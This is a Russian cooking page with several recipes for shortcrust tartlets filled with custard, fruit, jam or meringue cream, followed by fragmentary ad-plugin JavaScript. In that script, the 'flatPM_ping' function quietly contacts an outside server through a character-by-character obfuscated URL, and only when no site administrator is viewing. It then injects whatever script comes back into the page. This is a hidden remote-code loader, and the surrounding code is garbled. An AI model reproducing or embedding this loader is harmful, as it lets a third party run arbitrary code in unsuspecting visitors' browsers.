Корзиночки из песочного теста

Песочные корзинки с заварным кремом и малиной

Корзинки из хрустящего песочного теста, нежный заварной крем и душистая малина — идеально для домашнего чаепития!

Корзиночки будем готовить из песочного теста, которое замешивается на сливочном масле. Частично его можно заменить сливочным маргарином для выпечки (жирностью от 72%), например, взять в соотношении 1:1, то есть 100 г масла и 100 г маргарина. Чтобы тесто получилось нежным, а корзиночки рассыпчатыми, в муку добавим немного кукурузного крахмала, а вместо целого яйца будем использовать только желток.

Что касается заварного крема, то его будем готовить по классической технологии, на молоке. Для аромата добавим немного ванильного сахара. Готовый керм нужно будет разлить по корзинкам и повторно пропечь. Таким образом он станет более густым и приятным на вкус, при этом сохранит свою нежность и кремовую консистенцию.

Малина выбрана для этого десерта не случайно. Душистая ягода идеально сочетается с заварным кремом и хрустящим песочным тестом, она добавляет приятную кисло-сладкую нотку. Из указанного количества ингредиентов получится 10 больших корзиночек. Диаметр формы — 8 см.

Ингредиенты

  • сливочное масло – 200 г
  • сахар мелкий – 100 г
  • яичный желток – 1 шт.
  • пшеничная мука – 270 г
  • кукурузный крахмал – 30 г
  • соль – 1 щеп.
  • молоко – 350 мл
  • яичные желтки – 3 шт.
  • сахар – 4 ст. л.
  • мука – 1 ст. л.
  • ванильный сахар – 0,5 ст. л.

Приготовление

Масло, предварительно подтаявшее до комнатной температуры, перетираем вилкой вместе с сахаром. Добавляем желток, еще раз перетираем.

Затем в эту масляную основу добавляем просеянную муку, смешанную с крахмалом. Хорошо растираем ложкой до однородности.

Затем быстро замешиваем тесто руками и скатываем его в шар. Мягкую пластичную массу накрываем пленкой и отправляем в холодильник на полчаса.

Тесто делим на порции по количеству корзинок. Раскладываем по формочкам и вдавливаем руками, подравнивая края. Дно накалываем вилкой, чтобы не вздувалось при запекании. Формочки с тестом снова в холодильник на полчаса.

Тем временем готовим заварной крем. Желтки разбалтываем с 50 мл молока, сахаром и ванильным сахаром.

Всыпаем просеянную муку и размешиваем венчиком, чтобы не было комочков.

Оставшееся молоко (300 мл) прогреваем, но не доводим до кипения. Тонкой струйкой, постоянно помешивая, вливаем желтки с сахаром в молоко.

Продолжаем варить на тихом огне, постоянно помешивая венчиком, до тех пор, пока крем не загустеет. До кипения доводить нельзя, иначе заварной крем расслоится! Готовому крему даем немного остыть, время от времени помешиваем, чтобы на поверхности не образовывалась корка.

Формы с тестом помещаем на противень и отправляем в духовку, предварительно разогретую до 180 градусов (она обязательно должна быть уже горячей!). Выпекаем 10-12 минут, до полуготовности корзиночек. Даем немного остыть.

Вливаем в корзинки заварной крем.

Возвращаем в духовку и запекаем еще 10 минут при температуре 180 градусов.

Остывшие корзинки украшаем малиной и листиками мяты.

Перед подачей посыпаем сахарной пудрой. Завариваем чай и наслаждаемся хрустящими корзиночками с нежным заварным кремом и малиной.

Хранить десерт можно в холодильнике. На второй день коринки станут немного мягче, но все равно будут хорошо держать форму, останутся хрустящими и плотными.

Песочное тесто для корзиночек

Сегодня речь пойдёт о приготовлении корзиночек из песочного теста. Я предлагаю десертный вариант с использованием сахара, т.е. для приготовления всяких пироженок. Но если исключить сей ингредиент, то такие корзиночки замечательным образом можно использовать для приготовления закуски, наполнив их любимым салатом…

Необходимые для замеса теста продукты:

Время, которое нам здесь понадобится: не более 10-ти минут для замеса, около получаса для охлаждения, минут 5 – для формовки и до 10-ти минут для выпекания

Насколько сложно: ни насколько

Ход предлагаемых действий:

Для того, чтобы приготовить песочное тесто для вкусных и хрустящих корзиночек, нам понадобится большая блендерная чаша. Можно, конечно, обойтись и без неё, но с ней процесс будет очень лёгким, быстрым и практически незаметным. Так что советую это учесть.

Итак, выкладываем в чашу охлаждённое сливочное масло.

Следом пускаем просеянную муку, соль и сахар.

Далее добавляем отделённый от белка желток.

Осталось лишь нажать кнопочку блендера и преобразовать всё в крошку.

Далее у нас есть два варианта – крошка может быть достаточно мягкой и при сдавливании собираться в комок. В этом случае нам просто нужно так и поступить – собрать всё тесто в шар, обернуть полиэтиленом и убрать в холодильник.

Если же крошка получилась несколько сухой, то следует добавить совсем немного холодной воды, ещё раз нажать кнопку блендера и просто слегка обмять тесто.

А затем также поместить его в пакет и на полчаса отправить в холодильник.

Спустя указанное время мы раскатываем тесто, слегка подпыляя стол мукой, а затем с помощью металлических формочек для кексов вырезаем из теста заготовки для корзиночек и сразу же выкладываем их в формочки.

Выпекать корзиночки нужно совсем недолго – при температуре около 190-200 градусов буквально 8-10 минут.

Как только подрумянившиеся заготовки остынут, их можно доставать из формочек – особых усилий для этого не понадобится.

Остывшие корзиночки теперь можно наполнить любимым кремом, к примеру, заварным и украсить сверху фруктами или ягодами, орехами или шоколадом – всё по вкусу.

Корзиночки получаются очень вкусными, лёгкими и хрустящими.

Готовьте с удовольствием!

Чтобы получать лучшие статьи, подпишитесь на страницы Алимеро в Яндекс Дзен, Вконтакте, Одноклассниках, Facebook и Pinterest!

Корзиночки с фруктами и нежным заварным кремом

Песочное тесто очень вкусное. Рассыпчатое, оно просто тает во рту. А если его дополнить нежным заварным кремом и любимыми фруктами, то получится невероятно красивый и вкусный десерт, такой как на фото. Корзиночками можно побаловать как себя, так и подать это сладкое блюдо на праздничный стол.

Всю процедуру можно разделить на три этапа: приготовление корзиночек из теста, получение заварного крема, сборка изделий и их украшения фруктами или ягодами (этот ингредиент и его количество – по вкусу).

Ингредиенты

  • Для теста понадобятся такие составляющие:
  • сливочное масло (не сильно холодное) – 200 г (1 пачка)
  • желтки без белков – 2 штуки
  • сахар – 1 стакан (200 г, можно брать неполный)
  • мука – 2,5 стакана (часть пойдет в тесто, часть – для его вымешивания)
  • холодная вода – 2-3 столовых ложки
  • Необходимые компоненты для заварного крема:
  • молоко – 500 мл
  • сахар – 1 стакан (200 г)
  • крахмал (любой – из картофеля или кукурузы) – 2 столовых ложки
  • желтки – 2 штуки
  • ванилин – треть чайной ложки

Инструкция по приготовлению

Пошаговое приготовление корзиночек

  1. Сливочное масло необходимо растереть до однородной массы с сахаром и ванилином. Поэтому лучше брать масло комнатной температуры.
  2. Подмешать к смеси желтки, хорошо все смешать.
  3. Половину указанной в рецепте муки следует просеять в смесь из масла, сахара и желтков. Немного перемешать, прибавить холодную воду – 2 столовых ложки.
  4. Далее, тесто нужно вымешивать руками. Муку по мере необходимости подсыпать. Если песочное тесто рассыпается или получается излишне тугим, следует прибавить к нему еще одну ложку воды. Правильное песочное тесто – пластичное и мягкое, не липнет к рукам.
  5. Формы для корзиночек необходимо смазать жиром (маслом), припорошить мукой. Из указанных ингредиентов получается 12-14 корзиночек. Поэтому шар теста нужно разделить на такое количество частей. Каждый шарик прижать до лепешки и выстлать им рельефные формочки. Толщина теста должна быть небольшая, около 3 мм.
  6. Формы с песочным тестом обязательно нужно охладить в холодильнике в течение одного часа.
  7. Духовку следует предварительно разогреть до 180 градусов, поместить в нее корзинки, выпекать примерно 20 минут. Тесто должно подрумяниться.

Совет! Приготовьте деткам такие лукошки с творожной начинкой. Это будет не только вкусно, но и очень полезно.

Готовим заварной крем

Рецептура такого лакомства знакома многим. С заварным кремом часто готовят трубочки, орешки, пироги, кексы и другие десерты.

  1. Яичные желтки нужно растереть с сахарным песком, смешать с ванилином и крахмалом до однородной массы. Растирать лучше в той посуде, где будет вариться крем.
  2. Молоко следует подогреть. Часть влить в смесь из желтков и сахара. Очень хорошо перемешать до однородной массы. Затем влить оставшееся молоко.
  3. Смесь следует держать на огне до закипания, все время тщательно помешивая, чтобы не образовывались комки.
  4. После закипания заварной крем начнет густеть. Если он жидковатый, можно подержать на огне еще минуту-две, не забывая помешивать. Иначе он быстро пригорит. Сладость нужно снять с огня и дать полностью остыть.

Готовые песочные корзинки необходимо наполнить кремом, обязательно холодным (иначе они размокнут). А затем украсить любыми плодами. Поместить в холодильник примерно на час.

Совет! Для корзинок можно сделать белковый крем. Для этого 4 белка взбивают с 1 стаканом сахара (лучше пудры), до образования стойких пиков. Наполняют при помощи кондитерского мешка.

Несколько советов

  • Тарталетки из теста можно приготовить накануне праздника, а собирать сладость непосредственно перед подачей.
  • Такие угощения можно делать и с овощной начинкой, но тогда в тесто добавлять сахар не надо.
  • Красиво смотрятся такие лукошки с желе. Для этого в готовые корзиночки кладут немного крема, а сверху, кусочки приготовленного заранее состава с желатином.
  • Сваренный заранее крем допускается сберегать в холодильнике около суток. При желании в него можно добавить пищевой краситель, немного какао, шоколада.
  • Вместо свежих фруктов, можно использовать цукаты, джем, варенье без косточек (любые начинки, которые вы используете для пирогов).
  • Также хорошо пирожные украсить тертым шоколадом, кокосовой стружкой, рублеными орехами, вафельной крошкой, кондитерской посыпкой.

Корзиночки из песочного теста с фруктовой начинкой – незабываемый вкус детства. Готовить их в домашних условиях несложно. При этом они могут быть самыми разнообразными. Не бойтесь экспериментировать со вкусами.

Корзиночки из песочного теста

Многие пирожные знакомы нам с детства, так как продавались даже в самых дешевых буфетах. Сегодня многие хозяйки в своих кулинарных экспериментах пытаются повторить именно те блюда, которые доставляли им радость в детстве. И оказывается, что даже удивительные блюда вполне по силам приготовить в домашних условиях.

Пирожное корзиночки с белковым заварным кремом

Сами пирожные состоят из трех частей: песочное тесто для самой корзиночки, начинка в виде джема и крем для формирования красивого белоснежного пика. Если посмотреть на процесс приготовления с точки зрения сборки компонентов, все выглядит очень просто, поэтому остается только немного подготовиться, а для этого потребуется:

Ингредиенты

  • 150 г сливочного масла;
  • 350 г сахара;
  • 10 г ванильного сахара;
  • 1 целое куриное яйцо и 3 белка;
  • 1 столовая ложка сметаны;
  • 2 стакана муки;
  • 1 чайная ложка разрыхлителя;
  • 88 мл воды;
  • 1/3 чайной ложки лимонной кислоты;
  • джем густой (фруктовый или ягодный).

Рецепт песочного теста

Так как для приготовления крема требуется не так много времени, начать нужно с песочного теста для корзиночек. Размягченное сливочное масло необходимо соединить со 100 г сахара и ванильным сахаром.

В идеале для песочного теста необходимо использовать холодное масло, но с ним неудобно работать миксером, а если натереть замороженный продукт и соединять с другими ингредиентами, тесто в процессе выпекания получит полости, как у слоеного теста. Перемешивать лучше всего миксером, чтобы не просто получить сладкое масло, а пышным сливочный крем. Как только вы добьетесь нужной консистенции, можно будет выключить миксер и использовать более «медленные» приспособления для работы.

Постепенно к масляной смеси вмешивается 1 целое куриное яйцо и сметана.

Сметану нужно выбирать средней жирности, так как маленькая жирность сделает тесто слишком жидким. Последним ингредиентом в тесто входит мука, смешанная с разрыхлителем.

Ее добавляют небольшими горстями, пока полностью не соединят всю муку с уже подготовленной кремообразной массой.

Так как готовится песочное тесто, то месить его долго не нужно, достаточно лишь сформировать плотный ком. Тесто получается достаточно густое, не липнет к рукам, цвет более желтый, чем при замешивании других видов теста.

Готовая песочная основа заворачивается в пищевую пленку и на час отправляется для охлаждения в холодильник. Либо же можно на 30 минут поместить его в морозильную камеру.

Как сделать корзиночку из теста

В этот момент можно начать готовить крем, либо дожидаться того момента, когда формочки под пирожные отправятся в духовку. В любом случае охлажденное песочное тесто сворачивается в колбаску. От такого скатанного жгута отрезаются кусочки шириной в пару сантиметров, чтобы общий объем отрезанного теста примерно совпадал с грецким орехом. Как только колбаска порционно разделена, необходимо из каждого кусочка теста раскатать лепешку. От того, как толсто вы раскатаете ее, зависит толщина корзиночки, поэтому основываться нужно на собственных вкусах и предпочтениях.

Для выпекания лучше всего использовать железные формочки для кексов, которые изнутри смазываются маслом. Лепешка «усаживается» в форму таким образом, чтобы получилась корзиночка с полостью внутри. Края лепешки нужно тщательно разровнять и прилепить по стенкам формочки.

Готовятся такие корзиночки из песочного теста в духовке 7 минут при температуре 200 градусов.

Как приготовить белковый крем для пирожных

Пока готовятся заготовки, необходимо приступить к «завариванию» крема, так как джемовая прослойка не требует дополнительной подготовки. Основой для крема станут хорошо взбитые белки. У некоторых хозяек возникают сложности на этом этапе, так как они недостаточно времени работают миксером. Белки взбиваются до твердого состояния, когда венчик миксера уже туго идет по содержимому.

Если в этот момент перевернуть посуду со взбитыми белками, они не начнут стекать или деформировать ранее созданный на них узор.

На хорошее взбивание белков уходит около 5-6 минут.

Приготовление сладкого сиропа для заваривания крема

Также необходимо приготовится сахарный сироп из остатков сахара и воды. Сироп готовится примерно столько же, сколько взбиваются белки, однако совмещать эти процессы не следует, особенно тем, кто впервые пытается приготовить крем. Лучше потратить немного больше времени, но не отвлекаться. В этом и кроется успех вкусных блюд. Вода с сахаром на большом огне доводятся почти до кипения. То есть к этому моменту со дна уже должны пониматься пузыри, но они лопаются, еще не доходя до поверхности.

Как только сироп дойдет до подобного состояния необходимо резко уменьшить огонь почти до минимума. Примерно через 4 минут варки к сиропу добавляется лимонная кислота. Сироп не нужно постоянно помешивать, а вот смотреть за тем, насколько плавно проходит процесс – придется.

Когда сироп будет готов необходимо вновь включить миксер и начать взбивать белки. Очень медленно к взбивающимся белкам вливается сироп, пока полностью не перемешается. То есть где-то около 5-7 минут.

Как собрать сладкий десерт

Когда все ингредиенты будут готовы, можно начать «собирать» пирожные. В остывшую корзиночку выкладывается 1 столовая ложка джема, можно также взять варенье с крупными ягодами. Выбирается любое на ваш вкус.

Для формирования красивого завитка кремовой основы из взбитых белков можно воспользоваться кондитерским пакетом. Соорудить его можно из обычного, отрезав уголок. На пакет с кремом слегка надавливают, и он выпускает необходимую порцию крема, главное, чтобы прорезь была не слишком большой. Но и слишком маленькая не даст нужной формы.

Готовые пирожные можно посыпать цветной или белой кокосовой стружкой, цукатами, кондитерской посыпкой или любыми другими видами украшения выпечки.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};